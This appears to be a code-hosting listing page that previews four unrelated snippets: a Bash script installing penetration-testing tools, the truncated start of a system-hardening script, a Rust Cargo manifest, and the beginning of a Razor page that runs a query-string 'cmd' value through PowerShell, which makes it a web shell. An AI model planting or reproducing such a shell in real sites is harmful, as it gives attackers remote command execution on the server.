This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| set -e | |
| sudo apt update | |
| sudo apt install -y python3 python3-pip python3-venv | |
| sudo apt install -y openvpn ranger neovim python3-neovim seclists curl dnsrecon enum4linux feroxbuster gobuster impacket-scripts nbtscan nikto nmap onesixtyone oscanner redis-tools smbclient smbmap snmp sslscan sipvicious tnscmd10g whatweb | |
| python3 -m pipx ensurepath | |
| [ -f ~/.zshrc ] && source ~/.zshrc | |
| [ -f ~/.bashrc ] && source ~/.bashrc |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| read "Please make sure you read and understand this script before you run it. Proceed? (y/n)" answer | |
| if [[ $answer == [Yy] ]]; then | |
| # Update the System | |
| echo "Updating system..." | |
| sudo apt update && sudo apt upgrade -y | |
| # Enable the Firewall (UFW) | |
| echo "Installing and enabling UFW..." |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [package] | |
| name = "my_app" | |
| version = "0.1.0" | |
| authors = ["seska451"] | |
| edition = "2018" | |
| # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html | |
| [dependencies] | |
| clap = "3.0.0-beta.1" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @using System.Diagnostics; | |
| @using System.IO; | |
| @{ | |
| var cmd = Request.QueryString["cmd"]; | |
| var output = ""; | |
| if(string.IsNullOrWhiteSpace(cmd) == false) { | |
| output = powershell(cmd); | |
| } |